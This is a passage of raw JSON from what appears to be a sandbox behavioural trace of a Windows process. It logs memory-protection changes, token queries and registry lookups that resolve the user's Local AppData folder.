"arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1079 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1080 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1081 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\x08\\xe5\\x19\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1082 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 1083 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 1084 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1085 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1086 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d8" }, { "name": "ObjectAttributesName", "value": "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" } ], "repeated": 0, "id": 1087 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" } ], "repeated": 0, "id": 1088 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Category" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category" } ], "repeated": 0, "id": 1089 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Name" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Local AppData" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name" } ], "repeated": 0, "id": 1090 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder" } ], "repeated": 0, "id": 1091 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description" } ], "repeated": 0, "id": 1092 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "AppData\\Local" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath" } ], "repeated": 0, "id": 1093 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName" } ], "repeated": 0, "id": 1094 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip" } ], "repeated": 0, "id": 1095 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName" } ], "repeated": 0, "id": 1096 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon" } ], "repeated": 0, "id": 1097 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security" } ], "repeated": 0, "id": 1098 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource" } ], "repeated": 0, "id": 1099 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType" } ], "repeated": 0, "id": 1100 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly" } ], "repeated": 0, "id": 1101 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable" } ], "repeated": 0, "id": 1102 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate" } ], "repeated": 0, "id": 1103 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream" } ], "repeated": 0, "id": 1104 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath" } ], "repeated": 0, "id": 1105 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags" } ], "repeated": 0, "id": 1106 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes" } ], "repeated": 0, "id": 1107 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID" } ], "repeated": 0, "id": 1108 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler" } ], "repeated": 0, "id": 1109 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1110 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1111 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002dc" }, { "name": "ObjectAttributesName", "value": "PropertyBag" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PropertyBag" } ], "repeated": 0, "id": 1112 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002dc" } ], "repeated": 0, "id": 1113 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 1114 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002dc" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000240" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" } ], "repeated": 0, "id": 1115 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d8" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002dc" }, { "name": "ObjectAttributesName", "value": "SessionInfo\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1" } ], "repeated": 0, "id": 1116 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002d8" }, { "name": "ObjectAttributesName", "value": "KnownFolders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders" } ], "repeated": 0, "id": 1117 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" } ], "repeated": 0, "id": 1118 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xe4\\xe2\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xfe\\xff\\xff\\xffd\\xe3\\x19\\x00\\x17\\xa0Ot\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&\\xa0Ot\\xbc\\xdcCt\\x88\\xe3\\x19\\x00\\x84\\xe3\\x19\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1119 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1120 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d8" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" } ], "repeated": 0, "id": 1121 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" } ], "repeated": 0, "id": 1122 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e0" }, { "name": "ValueName", "value": "Local AppData" }, { "name": "Type", "value": "2", "pretty_value": "REG_EXPAND_SZ" }, { "name": "Information", "value": "%USERPROFILE%\\AppData\\Local" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" } ], "repeated": 0, "id": 1123 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d4" } ], "repeated": 0, "id": 1124 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e0" } ], "repeated": 0, "id": 1125 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local" } ], "repeated": 0, "id": 1126 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 1127 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": 